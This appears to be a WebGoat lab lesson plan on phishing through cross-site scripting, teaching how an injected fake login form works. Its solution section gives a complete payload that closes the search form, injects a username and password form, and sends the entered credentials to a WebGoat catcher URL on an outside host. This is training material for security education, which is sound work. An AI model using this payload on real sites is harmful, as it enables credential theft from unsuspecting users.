Phising with XSS

Lesson Plan Title: Phishing with XSS

Concept / Topic To Teach:
It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. With the help of XSS you can do a Phishing Attack and add content to a page which looks official. It is very hard for a victim to determinate that the content is malicious.

General Goal(s):
The user should be able to add a form asking for username and password. On submit the input should be sent to http://efeso4.mat.unical.it/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName

Solution:
With XSS it is possible to add further elements to an existing Page. This solution consists of two parts you have to combine:

A form the victim has to fill in
A script which reads the form and sends the gathered information to the attacker

A Form with username and password could look like this:

</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br></form><br><br><HR>

Search for this term and you will see that a form is added to the page since the search field accepts HTML.
The initial </form> tag is to terminate the original search form.

Now you need a script:

This script will read the input from the form and send it to the catcher of WebGoat.
The text in blue should match what is in your address bar. If you are using ports and/or webscarab, it may be different.
The last step is to put things together. Add a Button to the form which calls the script. You can reach this with the onclick="myFunction()" handler:

The final String looks like this:
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://efeso4.mat.unical.it/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

Search for this String and you will see a form asking for your username and password. Fill in these fields and click on the Login Button, which completes the lesson.

New login field after submitting the script.